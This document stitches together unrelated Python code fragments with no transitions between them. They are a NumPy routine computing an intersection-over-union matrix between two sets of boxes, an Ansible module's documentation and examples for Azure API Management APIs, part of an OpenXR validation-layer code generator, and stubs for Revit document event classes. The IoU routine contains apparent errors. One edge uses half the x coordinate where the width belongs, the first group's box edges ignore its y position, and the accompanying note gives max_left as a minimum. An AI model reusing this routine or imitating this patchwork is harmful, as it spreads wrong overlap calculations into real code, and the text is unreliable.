group_2_amount).reshape([group_1_amount, group_2_amount])
g_2_area_cross_col = (g_2_matrix[:, group2_h_index] * g_2_matrix[:, group2_w_index]).repeat(
group_1_amount).reshape(group_2_amount, group_1_amount).T
g_1_top_y_matrix_cross_row = (-0.5 * g_1_matrix[:, group1_h_index]).repeat(
group_2_amount).reshape([group_1_amount, group_2_amount])
g_1_bottom_y_matrix_cross_row = (0.5 * g_1_matrix[:, group1_h_index]).repeat(
group_2_amount).reshape([group_1_amount, group_2_amount])
g_1_right_x_matrix_cross_row = (0.5 * g_1_matrix[:, group1_w_index]).repeat(
group_2_amount).reshape([group_1_amount, group_2_amount])
g_1_left_x_matrix_cross_row = (-0.5 * g_1_matrix[:, group1_w_index]).repeat(
group_2_amount).reshape([group_1_amount, group_2_amount])
g_2_top_y_matrix_cross_col = (g_2_matrix[:, group2_y_index] - 0.5 * g_2_matrix[:, group2_h_index]).repeat(
group_1_amount).reshape([group_2_amount, group_1_amount]).T
g_2_bottom_y_matrix_cross_col = (g_2_matrix[:, group2_y_index] + 0.5 * g_2_matrix[:, group2_h_index]).repeat(
group_1_amount).reshape(group_2_amount, group_1_amount).T
g_2_right_x_matrix_cross_col = (g_2_matrix[:, group2_x_index] + 0.5 * g_2_matrix[:, group2_w_index]).repeat(
group_1_amount).reshape([group_2_amount, group_1_amount]).T
g_2_left_x_matrix_cross_col = (g_2_matrix[:, group2_x_index] - 0.5 * g_2_matrix[:, group2_x_index]).repeat(
group_1_amount).reshape(group_2_amount, group_1_amount).T
# calculate the overlap box
max_top = np.max(np.concatenate((np.expand_dims(g_1_top_y_matrix_cross_row, -1),
np.expand_dims(g_2_top_y_matrix_cross_col, -1)), -1), -1)
min_bottom = np.min(np.concatenate((np.expand_dims(g_1_bottom_y_matrix_cross_row, -1),
np.expand_dims(g_2_bottom_y_matrix_cross_col, -1)), -1), -1)
min_right = np.min(np.concatenate((np.expand_dims(g_1_right_x_matrix_cross_row, -1),
np.expand_dims(g_2_right_x_matrix_cross_col, -1)), -1), -1)
max_left = np.max(np.concatenate((np.expand_dims(g_1_left_x_matrix_cross_row, -1),
np.expand_dims(g_2_left_x_matrix_cross_col, -1)), -1), -1)
# calculate cross area
crossed_height = min_bottom - max_top
crossed_width = min_right - max_left
# apply ReLU
crossed_height[crossed_height < 0] = 0
crossed_width[crossed_width < 0] = 0
iou_area = crossed_height * crossed_width
iou = iou_area / (g_1_area_cross_row + g_2_area_cross_col - iou_area)
return iou
pass
"""
Implement calc_iou_matrix_thw:
base on center_y_x and height width, there is algorithm:
max_top: max(group1_y, group_2_y)
min_bottom: min(group1_y + group1_h, group_2_y + group2_h)
min_right: min(group_1_x + group1_w, group2_x + group2_w)
max_left: min(group_1_x, group2_x)
use[[center_y, center_x, height, width], ....] as an example:
in order to create the IoU matrix
we should create group1_Box_M IoU group2_Box_N
we make group1 data repeat n cross row
just like:
group1_y:
[[group1_box_1_top_y, ..n.., group1_box_1_top_y],
[group1_box_2_top_y, ..n.., group1_box_2_top_y],
:
m
:,
[group1_box_m_top_y, ..n.., group1_box_m_top_y],
]
we make group2 data repeat m cross col
and group2 just make more one process transpose
and then use the algorithm
get then max_top, min_bottom, min_right, max_left Matrix
and then make element which lower than zeros zeroed
finally generate a m x n IoU matrix
"""
def calc_iou_matrix_thw(
group1,
group2,
group1_y_index=0,
group1_x_index=1,
group1_h_index=2,
group1_w_index=3,
group2_y_index=0,
group2_x_index=1,
group2_h_index=2,
group2_w_index=3
):
"""
calculate the IoU matrix base on group1 and group2 which carry the parameter top_y, top_x, height and width
:param group1: [[top_y, top_x, height, width], ....] according to default group1_*_index
:param group2: [[top_y, top_x, height, width], ...] according to default group2_*_index
:param group1_y_index: parameter represent the index of y in group1
:param group1_x_index: parameter represent the index of x in group1
:param group1_h_index: parameter represent the index of h in group1
:param group1_w_index: parameter represent the index of 2 in group1
:param group2_y_index: parameter represent the index of y in group2
:param group2_x_index: parameter represent the index of x in group2
:param group2_h_index: parameter represent the index of h in group2
:param group2_w_index: parameter represent the index of w in group2
:return:
group1_box_0 iou group2_box_0, group1_box_0 iou group2_box_1, ..., group1_box_0 iou group2_box_(n - 1), group1_box_0 iou group2_box_n
, , , ,
group1_box_1 iou group2_box_0, ... , ..., ... , group1_box_1 iou group2_box_n
,
... ...
,
... ...
,
... ...
,
group1_box_m iou group2_box_0, ... , ..., ... , | |
<gh_stars>0
#!/usr/bin/python
#
# Copyright (c) 2019 <NAME>, (@zikalino)
#
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: azure_rm_apimanagementapi
version_added: '2.9'
short_description: Manage Azure Api instance.
description:
- 'Create, update and delete instance of Azure Api.'
options:
resource_group:
description:
- The name of the resource group.
required: true
type: str
service_name:
description:
- The name of the API Management service.
required: true
type: str
api_id:
description:
- >-
API revision identifier. Must be unique in the current API Management
service instance. Non-current revision has ;rev=n as a suffix where n is
the revision number.
required: true
type: str
description:
description:
- Description of the API. May include HTML formatting tags.
type: str
authentication_settings:
description:
- Collection of authentication settings included into this API.
type: dict
suboptions:
o_auth2:
description:
- OAuth2 Authentication settings
type: dict
suboptions:
authorization_server_id:
description:
- OAuth authorization server identifier.
type: str
scope:
description:
- operations scope.
type: str
openid:
description:
- OpenID Connect Authentication Settings
type: dict
suboptions:
openid_provider_id:
description:
- OAuth authorization server identifier.
type: str
bearer_token_sending_methods:
description:
- How to send token to the server.
type: list
subscription_key_required:
description:
- >-
Specifies whether subscription key is required during call to this
API, true - API is included into closed products only, false - API
is included into open products alone, null - there is a mix of
products.
type: boolean
subscription_key_parameter_names:
description:
- Protocols over which API is made available.
type: dict
suboptions:
header:
description:
- Subscription key header name.
type: str
query:
description:
- Subscription key query string parameter name.
type: str
type:
description:
- Resource type for API Management resource.
type: str
api_revision:
description:
- >-
Describes the Revision of the Api. If no value is provided, default
revision 1 is created
type: str
api_version:
description:
- Indicates the Version identifier of the API if the API is versioned
type: str
is_current:
description:
- Indicates if API revision is current api revision.
type: boolean
api_revision_description:
description:
- Description of the Api Revision.
type: str
api_version_description:
description:
- Description of the Api Version.
type: str
api_version_set_id:
description:
- A resource identifier for the related ApiVersionSet.
type: str
subscription_required:
description:
- >-
Specifies whether an API or Product subscription is required for
accessing the API.
type: boolean
source_api_id:
description:
- API identifier of the source API.
type: str
display_name:
description:
- API name. Must be 1 to 300 characters long.
type: str
service_url:
description:
- >-
Absolute URL of the backend service implementing this API. Cannot be
more than 2000 characters long.
type: str
path:
description:
- >-
Relative URL uniquely identifying this API and all of its resource paths
within the API Management service instance. It is appended to the API
endpoint base URL specified during the service instance creation to form
a public URL for this API.
required: true
type: str
protocols:
description:
- Describes on which protocols the operations in this API can be invoked.
type: list
api_version_set:
description:
- Version set details
type: dict
suboptions:
id:
description:
- >-
Identifier for existing API Version Set. Omit this value to create a
new Version Set.
type: str
name:
description:
- The display Name of the API Version Set.
type: str
description:
description:
- Description of API Version Set.
type: str
versioning_scheme:
description:
- >-
An value that determines where the API Version identifer will be
located in a HTTP request.
type: str
version_query_name:
description:
- >-
Name of query parameter that indicates the API Version if
versioningScheme is set to `query`.
type: str
version_header_name:
description:
- >-
Name of HTTP header parameter that indicates the API Version if
versioningScheme is set to `header`.
type: str
value:
description:
- Content value when Importing an API.
type: str
format:
description:
- Format of the Content in which the API is getting imported.
type: str
wsdl_selector:
description:
- Criteria to limit import of WSDL to a subset of the document.
type: dict
suboptions:
wsdl_service_name:
description:
- Name of service to import from WSDL
type: str
wsdl_endpoint_name:
description:
- Name of endpoint(port) to import from WSDL
type: str
api_type:
description:
- >-
Type of Api to create. <br> * `http` creates a SOAP to REST API <br> *
`soap` creates a SOAP pass-through API .
type: str
is_online:
description:
- Indicates if API revision is accessible via the gateway.
type: boolean
id:
description:
- Resource ID.
type: str
name:
description:
- Resource name.
type: str
state:
description:
- Assert the state of the Api.
- Use C(present) to create or update an Api and C(absent) to delete it.
default: present
choices:
- absent
- present
extends_documentation_fragment:
- azure
author:
- <NAME> (@zikalino)
'''
EXAMPLES = '''
- name: ApiManagementCreateApiUsingOai3Import
azure_rm_apimanagementapi:
resource_group: myResourceGroup
service_name: myService
api_id: myApi
path: petstore
value: >-
https://raw.githubusercontent.com/OAI/OpenAPI-Specification/master/examples/v3.0/petstore.yaml
format: openapi-link
- name: ApiManagementCreateApiUsingSwaggerImport
azure_rm_apimanagementapi:
resource_group: myResourceGroup
service_name: myService
api_id: myApi
path: petstore
value: 'http://petstore.swagger.io/v2/swagger.json'
format: swagger-link-json
- name: ApiManagementCreateApiUsingWadlImport
azure_rm_apimanagementapi:
resource_group: myResourceGroup
service_name: myService
api_id: myApi
path: collector
value: >-
https://developer.cisco.com/media/wae-release-6-2-api-reference/wae-collector-rest-api/application.wadl
format: wadl-link-json
- name: ApiManagementCreateSoapToRestApiUsingWsdlImport
azure_rm_apimanagementapi:
resource_group: myResourceGroup
service_name: myService
api_id: myApi
path: currency
value: 'http://www.webservicex.net/CurrencyConvertor.asmx?WSDL'
format: wsdl-link
wsdl_selector:
wsdl_service_name: CurrencyConvertor
wsdl_endpoint_name: CurrencyConvertorSoap
- name: ApiManagementCreateSoapPassThroughApiUsingWsdlImport
azure_rm_apimanagementapi:
resource_group: myResourceGroup
service_name: myService
api_id: myApi
path: currency
value: 'http://www.webservicex.net/CurrencyConvertor.asmx?WSDL'
format: wsdl-link
wsdl_selector:
wsdl_service_name: CurrencyConvertor
wsdl_endpoint_name: CurrencyConvertorSoap
api_type: soap
- name: ApiManagementCreateApi
azure_rm_apimanagementapi:
resource_group: myResourceGroup
service_name: myService
api_id: myApi
description: apidescription5200
authentication_settings:
o_auth2:
authorization_server_id: authorizationServerId2283
scope: oauth2scope2580
subscription_key_parameter_names:
header: header4520
query: query3037
display_name: apiname1463
service_url: 'http://newechoapi.cloudapp.net/api'
path: newapiPath
protocols:
- https
- http
- name: ApiManagementCreateApiRevisionFromExistingApi
azure_rm_apimanagementapi:
resource_group: myResourceGroup
service_name: myService
api_id: myApi
api_revision_description: Creating a Revision of an existing API
source_api_id: >-
/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group
}}/providers/Microsoft.ApiManagement/service/{{ service_name }}/apis/{{
api_name }}
service_url: 'http://echoapi.cloudapp.net/apiv3'
path: echo
- name: ApiManagementCreateApiNewVersionUsingExistingApi
azure_rm_apimanagementapi:
resource_group: myResourceGroup
service_name: myService
api_id: myApi
description: >-
Create Echo API into a new Version using Existing Version Set and Copy all
Operations.
api_version: v4
is_current: true
api_version_set_id: >-
/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group
}}/providers/Microsoft.ApiManagement/service/{{ service_name
}}/apiVersionSets/{{ api_version_set_name }}
subscription_required: true
source_api_id: >-
/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group
}}/providers/Microsoft.ApiManagement/service/{{ service_name }}/apis/{{
api_name }}
display_name: Echo API2
service_url: 'http://echoapi.cloudapp.net/api'
path: echo2
protocols:
- http
- https
- name: ApiManagementCreateApiClone
azure_rm_apimanagementapi:
resource_group: myResourceGroup
service_name: myService
api_id: myApi
description: Copy of Existing Echo Api including Operations.
is_current: true
subscription_required: true
source_api_id: >-
/subscriptions/{{ subscription_id }}/resourceGroups/{{ resource_group
}}/providers/Microsoft.ApiManagement/service/{{ service_name }}/apis/{{
api_name }}
display_name: Echo API2
service_url: 'http://echoapi.cloudapp.net/api'
path: echo2
protocols:
- http
- https
- name: ApiManagementCreateApiWithOpenIdConnect
azure_rm_apimanagementapi:
resource_group: myResourceGroup
service_name: myService
api_id: myApi
description: >-
This is a sample server Petstore server. You can find out more about
Swagger at [http://swagger.io](http://swagger.io) or on [irc.freenode.net,
#swagger](http://swagger.io/irc/). For this sample, you can use the api
key `special-key` to test the authorization filters.
authentication_settings:
openid:
openid_provider_id: testopenid
bearer_token_sending_methods:
- authorizationHeader
subscription_key_parameter_names:
header: Ocp-Apim-Subscription-Key
query: subscription-key
display_name: Swagger Petstore
service_url: 'http://petstore.swagger.io/v2'
path: petstore
protocols:
- https
- name: ApiManagementCreateApiUsingImportOverrideServiceUrl
azure_rm_apimanagementapi:
resource_group: myResourceGroup
service_name: myService
api_id: myApi
service_url: 'http://petstore.swagger.wordnik.com/api'
path: petstoreapi123
value: 'http://apimpimportviaurl.azurewebsites.net/api/apidocs/'
format: swagger-link
- name: ApiManagementUpdateApi
azure_rm_apimanagementapi:
resource_group: myResourceGroup
service_name: myService
api_id: myApi
display_name: Echo API New
service_url: 'http://echoapi.cloudapp.net/api2'
path: newecho
- name: ApiManagementDeleteApi
azure_rm_apimanagementapi:
resource_group: myResourceGroup
service_name: myService
api_id: myApi
state: absent
'''
RETURN = '''
id:
description:
- Resource ID.
returned: always
type: str
sample: null
name:
description:
- Resource name.
returned: always
type: str
sample: null
type:
description:
- Resource type for API Management resource.
returned: always
type: str
sample: null
properties:
description:
- Api entity contract properties.
returned: always
type: dict
sample: null
contains:
description:
description:
- Description of the API. May include HTML formatting tags.
returned: always
type: str
sample: null
authentication_settings:
description:
- Collection of authentication settings included into this API.
returned: always
type: dict
sample: null
contains:
o_auth2:
description:
- OAuth2 Authentication settings
returned: always
type: dict
sample: null
contains:
authorization_server_id:
description:
- OAuth authorization server identifier.
returned: always
type: str
sample: null
scope:
description:
- operations scope.
returned: always
type: str
sample: null
openid:
description:
- OpenID Connect Authentication | |
%s\n' % xr_struct.protect_string
struct_check += '\n'
return struct_check
# Write an inline validation check for handle parents
# self the ValidationSourceOutputGenerator object
# instance_info_string string used to identify the variable associated with the instance information struct.
# first_handle_tuple the handle tuple associated with the type of the first handle
# first_handle_mem_param the member/param of the first handle
# first_handle_desc_name the descriptive name of the first handle
# cur_handle_tuple the handle tuple associated with the type of the current handle
# cur_handle_mem_param the member/param of the current handle
# cur_handle_desc_name the descriptive name of the current handle
# vuid_name the VUID identifier to associate this check and member/param name with
# cmd_name_param the parameter containing the associated command name
# indent the number of tab-stops to indent the current inline strings
def writeInlineParentCheckCall(self, instance_info_string, first_handle_tuple, first_handle_mem_param, first_handle_desc_name,
cur_handle_tuple, cur_handle_mem_param, cur_handle_desc_name, vuid_name,
cmd_name_param, indent):
parent_check_string = ''
parent_id = 'commonparent'
if (first_handle_tuple.name == cur_handle_tuple.parent or
cur_handle_tuple.name == first_handle_tuple.parent):
parent_id = '%s-parent' % cur_handle_mem_param.name
parent_check_string += self.writeIndent(indent)
pointer_deref = ''
if cur_handle_mem_param.pointer_count > 0:
pointer_deref = '*'
compare_flag = 'true'
if first_handle_mem_param.type == cur_handle_mem_param.type:
compare_flag = 'false'
if cur_handle_mem_param.is_optional:
parent_check_string += '// If the second handle is optional, only check for a common parent if\n'
parent_check_string += self.writeIndent(indent)
parent_check_string += '// it is not XR_NULL_HANDLE\n'
parent_check_string += self.writeIndent(indent)
parent_check_string += 'if (!IsIntegerNullHandle(%s) && !VerifyXrParent(%s, MakeHandleGeneric(%s),\n' % (
cur_handle_desc_name,
self.genXrObjectType(first_handle_mem_param.type),
first_handle_desc_name)
parent_check_string += ' %s, MakeHandleGeneric(%s%s), %s)) {\n' % (
self.genXrObjectType(cur_handle_mem_param.type),
pointer_deref,
cur_handle_desc_name,
compare_flag)
else:
parent_check_string += '// Verify that the handles share a common ancestry\n'
parent_check_string += self.writeIndent(indent)
parent_check_string += 'if (!VerifyXrParent(%s, MakeHandleGeneric(%s),\n' % (
self.genXrObjectType(first_handle_mem_param.type), first_handle_desc_name)
parent_check_string += ' %s, MakeHandleGeneric(%s%s), %s)) {\n' % (
self.genXrObjectType(cur_handle_mem_param.type), pointer_deref, cur_handle_desc_name, compare_flag)
indent = indent + 1
parent_check_string += self.writeIndent(indent)
parent_check_string += 'std::ostringstream oss_error;\n'
parent_check_string += self.writeIndent(indent)
parent_check_string += 'oss_error << "%s " << HandleToHexString(%s);\n' % (
first_handle_mem_param.type, first_handle_desc_name)
if first_handle_tuple.name == cur_handle_tuple.parent:
parent_check_string += self.writeIndent(indent)
parent_check_string += 'oss_error << " must be a parent to %s ";\n' % cur_handle_mem_param.type
parent_check_string += self.writeIndent(indent)
parent_check_string += 'oss_error << HandleToHexString(%s);\n' % cur_handle_desc_name
elif cur_handle_tuple.name == first_handle_tuple.parent:
parent_check_string += self.writeIndent(indent)
parent_check_string += 'oss_error << " must be a child of %s ";\n' % cur_handle_mem_param.type
parent_check_string += self.writeIndent(indent)
parent_check_string += 'oss_error << HandleToHexString(%s);\n' % cur_handle_desc_name
else:
parent_check_string += self.writeIndent(indent)
parent_check_string += 'oss_error << " and %s ";\n' % cur_handle_mem_param.type
parent_check_string += self.writeIndent(indent)
parent_check_string += 'oss_error << HandleToHexString(%s);\n' % cur_handle_desc_name
parent_check_string += self.writeIndent(indent)
parent_check_string += 'oss_error << " must share a parent";\n'
parent_check_string += self.writeIndent(indent)
parent_check_string += 'CoreValidLogMessage(%s, "VUID-%s-%s",\n' % (instance_info_string,
vuid_name,
parent_id)
parent_check_string += self.writeIndent(indent)
parent_check_string += ' VALID_USAGE_DEBUG_SEVERITY_ERROR, %s,\n' % cmd_name_param
parent_check_string += self.writeIndent(indent)
parent_check_string += ' objects_info, oss_error.str());\n'
parent_check_string += self.writeIndent(indent)
parent_check_string += 'return XR_ERROR_VALIDATION_FAILURE;\n'
indent = indent - 1
parent_check_string += self.writeIndent(indent)
parent_check_string += '}\n'
return parent_check_string
# Generate C++ code to validate the inputs of the current command.
# self the ValidationSourceOutputGenerator object
# cur_command the command generated in automatic_source_generator.py to validate
def genValidateInputsFunc(self, cur_command):
pre_validate_func = ''
pre_validate_func += 'XrResult %s(' % cur_command.name.replace("xr",
"GenValidUsageInputsXr")
pre_validate_func += '\n'
pre_validate_func += ',\n'.join((param.cdecl.strip() for param in cur_command.params))
pre_validate_func += ') {\n'
wrote_handle_check_proto = False
command_name_string = '"%s"' % cur_command.name
# If the first parameter is a handle and we either have to validate that handle, or check
# for extension information, then we will need the instance information.
indent = 1
pre_validate_func += self.writeIndent(indent)
pre_validate_func += 'try {\n'
indent = indent + 1
pre_validate_func += self.writeIndent(indent)
pre_validate_func += 'XrResult xr_result = XR_SUCCESS;\n'
pre_validate_func += self.writeIndent(indent)
pre_validate_func += 'std::vector<GenValidUsageXrObjectInfo> objects_info;\n'
first_param = cur_command.params[0]
first_param_tuple = self.getHandle(first_param.type)
if first_param_tuple is not None:
first_handle_name = self.getFirstHandleName(first_param)
obj_type = self.genXrObjectType(first_param.type)
pre_validate_func += self.writeIndent(indent)
pre_validate_func += 'objects_info.emplace_back(%s, %s);\n\n'% (first_handle_name, obj_type)
# Must verify this param first.
# Can skip validating it later.
pre_validate_func += self.outputParamMemberContents(True, cur_command.name, first_param, '',
'nullptr', # no instance_info yet!
command_name_string,
True,
first_param,
first_param.name,
first_param_tuple,
wrote_handle_check_proto,
indent)
wrote_handle_check_proto = True
if first_param_tuple.name == 'XrInstance':
pre_validate_func += self.writeIndent(indent)
pre_validate_func += 'GenValidUsageXrInstanceInfo *gen_instance_info = g_instance_info.get(%s);\n' % first_handle_name
else:
pre_validate_func += self.writeIndent(indent)
pre_validate_func += 'auto info_with_instance = %s.getWithInstanceInfo(%s);\n' % (
self.makeInfoName(handle_type_name=first_param.type), first_handle_name)
pre_validate_func += self.writeIndent(indent)
pre_validate_func += 'GenValidUsageXrHandleInfo *gen_%s_info = info_with_instance.first;\n' % undecorate(first_param_tuple.name)
pre_validate_func += self.writeIndent(indent)
pre_validate_func += '(void)gen_%s_info; // quiet warnings\n' % undecorate(first_param_tuple.name)
pre_validate_func += self.writeIndent(indent)
pre_validate_func += 'GenValidUsageXrInstanceInfo *gen_instance_info = info_with_instance.second;\n'
pre_validate_func += self.writeIndent(indent)
pre_validate_func += '(void)gen_instance_info; // quiet warnings\n'
# If any of the associated handles has validation state tracking, get the
# appropriate struct setup for validation later in the function
valid_type_list = []
if cur_command.checks_state:
for cur_state in self.api_states:
if cur_command.name in cur_state.check_commands:
command_param_of_type = ''
for param in cur_command.params:
if param.type == cur_state.type:
command_param_of_type = param.name
break
if command_param_of_type and cur_state.type not in valid_type_list:
valid_type_list.append(cur_state.type)
pre_validate_func += self.writeIndent(2)
pre_validate_func += 'auto %s_valid = g_%s_valid_states[%s];\n' % (
undecorate(cur_state.type), undecorate(cur_state.type), command_param_of_type)
for additional_ext in cur_command.required_exts:
pre_validate_func += self.writeIndent(indent)
pre_validate_func += '// Check to make sure that the extension this command is in has been enabled\n'
pre_validate_func += self.writeIndent(indent)
pre_validate_func += 'if (!ExtensionEnabled(gen_instance_info->enabled_extensions, "%s")) {\n' % additional_ext
pre_validate_func += self.writeIndent(indent + 1)
pre_validate_func += 'return XR_ERROR_VALIDATION_FAILURE;\n'
pre_validate_func += self.writeIndent(indent)
pre_validate_func += '}\n'
instance_info_variable = 'gen_instance_info' if first_param_tuple else 'nullptr'
# Check for non-optional null pointers
for count, param in enumerate(cur_command.params):
is_first = (count == 0)
if is_first and first_param_tuple:
# This is the first param, which we already validated as being a handle above. Skip this here.
continue
if not is_first and param.is_handle and not param.pointer_count > 0:
pre_validate_func += self.writeIndent(indent)
pre_validate_func += 'objects_info.emplace_back(%s, %s);\n' % (param.name, self.genXrObjectType(
param.type))
if not param.no_auto_validity:
pre_validate_func += self.outputParamMemberContents(True, cur_command.name, param, '',
instance_info_variable,
command_name_string,
is_first,
first_param,
first_param.name,
first_param_tuple,
wrote_handle_check_proto,
indent)
wrote_handle_check_proto = True
count = count + 1
# If this command needs to be checked to ensure that it is executing between
# a "begin" and an "end" command, do so.
if cur_command.checks_state:
for cur_state in self.api_states:
if cur_command.name in cur_state.check_commands:
for param in cur_command.params:
if param.type == cur_state.type:
break
pre_validate_func += self.writeIndent(2)
pre_validate_func += '// Validate that this command is called at the proper time between the\n'
pre_validate_func += self.writeIndent(2)
pre_validate_func += '// appropriate commands\n'
pre_validate_func += self.writeIndent(2)
pre_validate_func += 'if (!%s_valid->%s) {\n' % (
undecorate(cur_state.type), cur_state.variable)
pre_validate_func += self.writeIndent(3)
pre_validate_func += 'std::string error_msg = "%s is required to be called between successful calls to ";\n' % cur_command.name
pre_validate_func += self.writeIndent(3)
pre_validate_func += 'error_msg += "'
cur_count = 0
for begin_command in cur_state.begin_commands:
if cur_count > 0:
pre_validate_func += '/'
cur_count += 1
pre_validate_func += '%s' % begin_command
pre_validate_func += ' and '
cur_count = 0
for end_command in cur_state.end_commands:
if cur_count > 0:
pre_validate_func += '/'
cur_count += 1
pre_validate_func += '%s' % end_command
pre_validate_func += ' commands";\n'
pre_validate_func += self.writeIndent(3)
pre_validate_func += 'CoreValidLogMessage(%s, "VUID-%s-%s-checkstate",\n' % (
instance_info_variable, cur_command.name, cur_state.state)
pre_validate_func += self.writeIndent(3)
pre_validate_func += ' VALID_USAGE_DEBUG_SEVERITY_ERROR, "%s", objects_info,\n' % cur_command.name
pre_validate_func += self.writeIndent(3)
pre_validate_func += ' error_msg);\n'
pre_validate_func += self.writeIndent(3)
pre_validate_func += 'return XR_ERROR_VALIDATION_FAILURE;\n'
pre_validate_func += self.writeIndent(2)
pre_validate_func += '}\n'
# If this command needs to indicate that a validation state has begun, do so.
if cur_command.begins_state:
for cur_state in self.api_states:
if cur_command.name in cur_state.check_commands:
for param in cur_command.params:
if param.type == cur_state.type:
break
# First, make sure we're not calling two (or more) "begins" in a row
pre_validate_func += self.writeIndent(2)
pre_validate_func += '// Validate that this command is called first or only after the corresponding\n'
pre_validate_func += self.writeIndent(2)
pre_validate_func += '// "completion" commands\n'
pre_validate_func += self.writeIndent(2)
pre_validate_func += 'if (%s_valid->%s) {\n' % (
undecorate(cur_state.type), cur_state.variable)
pre_validate_func += self.writeIndent(3)
pre_validate_func += 'std::string error_msg = "%s is called again without first successfully calling ";\n' % cur_command.name
pre_validate_func += self.writeIndent(3)
pre_validate_func += 'error_msg += "'
cur_count = 0
for end_command in cur_state.end_commands:
if cur_count > 0:
pre_validate_func += '/'
cur_count += 1
pre_validate_func += '%s' % end_command
pre_validate_func += '";\n'
pre_validate_func += self.writeIndent(3)
pre_validate_func += 'CoreValidLogMessage(%s, "VUID-%s-%s-beginstate",\n' % (
instance_info_variable, cur_command.name, cur_state.state)
pre_validate_func += self.writeIndent(3)
pre_validate_func += ' VALID_USAGE_DEBUG_SEVERITY_ERROR, "%s", objects_info,\n' | |
"""Indicates whether the document is to be saved as master file.
Get: IsSavingAsMasterFile(self: DocumentSavedAsEventArgs) -> bool
"""
OriginalPath = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Original path of the document.
Get: OriginalPath(self: DocumentSavedAsEventArgs) -> str
"""
class DocumentSavedEventArgs(RevitAPIPostDocEventArgs, IDisposable):
""" The event arguments used by the DocumentSaved event. """
def Dispose(self):
""" Dispose(self: RevitAPIEventArgs, A_0: bool) """
pass
def ReleaseUnmanagedResources(self, *args): # cannot find CLR method
""" ReleaseUnmanagedResources(self: RevitAPIEventArgs, disposing: bool) """
pass
def __enter__(self, *args): # cannot find CLR method
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self, *args): # cannot find CLR method
""" __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
class DocumentSavingAsEventArgs(RevitAPIPreDocEventArgs, IDisposable):
""" The event arguments used by the DocumentSavingAs event. """
def Dispose(self):
""" Dispose(self: RevitAPIEventArgs, A_0: bool) """
pass
def ReleaseUnmanagedResources(self, *args): # cannot find CLR method
""" ReleaseUnmanagedResources(self: RevitAPIEventArgs, disposing: bool) """
pass
def __enter__(self, *args): # cannot find CLR method
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self, *args): # cannot find CLR method
""" __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
IsSavingAsMasterFile = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Indicates whether the document is to be saved as master file.
Get: IsSavingAsMasterFile(self: DocumentSavingAsEventArgs) -> bool
"""
PathName = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Target path to which the document is to be saved.
Get: PathName(self: DocumentSavingAsEventArgs) -> str
"""
class DocumentSavingEventArgs(RevitAPIPreDocEventArgs, IDisposable):
""" The event arguments used by the DocumentSaving event. """
def Dispose(self):
""" Dispose(self: RevitAPIEventArgs, A_0: bool) """
pass
def ReleaseUnmanagedResources(self, *args): # cannot find CLR method
""" ReleaseUnmanagedResources(self: RevitAPIEventArgs, disposing: bool) """
pass
def __enter__(self, *args): # cannot find CLR method
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self, *args): # cannot find CLR method
""" __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
class DocumentSynchronizedWithCentralEventArgs(RevitAPIPostDocEventArgs, IDisposable):
""" The event arguments used by the DocumentSynchronizedWithCentralEventArgs event. """
def Dispose(self):
""" Dispose(self: RevitAPIEventArgs, A_0: bool) """
pass
def ReleaseUnmanagedResources(self, *args): # cannot find CLR method
""" ReleaseUnmanagedResources(self: RevitAPIEventArgs, disposing: bool) """
pass
def __enter__(self, *args): # cannot find CLR method
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self, *args): # cannot find CLR method
""" __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
class DocumentSynchronizingWithCentralEventArgs(RevitAPIPreDocEventArgs, IDisposable):
""" The event arguments used by the DocumentSynchronizingWithCentralEventArgs event. """
def Dispose(self):
""" Dispose(self: RevitAPIEventArgs, A_0: bool) """
pass
def ReleaseUnmanagedResources(self, *args): # cannot find CLR method
""" ReleaseUnmanagedResources(self: RevitAPIEventArgs, disposing: bool) """
pass
def __enter__(self, *args): # cannot find CLR method
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self, *args): # cannot find CLR method
""" __exit__(self: IDisposable, exc_type: object, exc_value: object, exc_back: object) """
pass
def __init__(self, *args): # cannot find CLR method
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
Comments = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""User's comments for synchronization.
Get: Comments(self: DocumentSynchronizingWithCentralEventArgs) -> str
"""
Location = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""Full path of the central model which is to be synchronized.
Get: Location(self: DocumentSynchronizingWithCentralEventArgs) -> str
"""
Options = property(
lambda self: object(), lambda self, v: None, lambda self: None
) # default
"""User's options associated with the synchronization operation.
Get: Options(self: DocumentSynchronizingWithCentralEventArgs) -> SynchronizeWithCentralOptions
"""
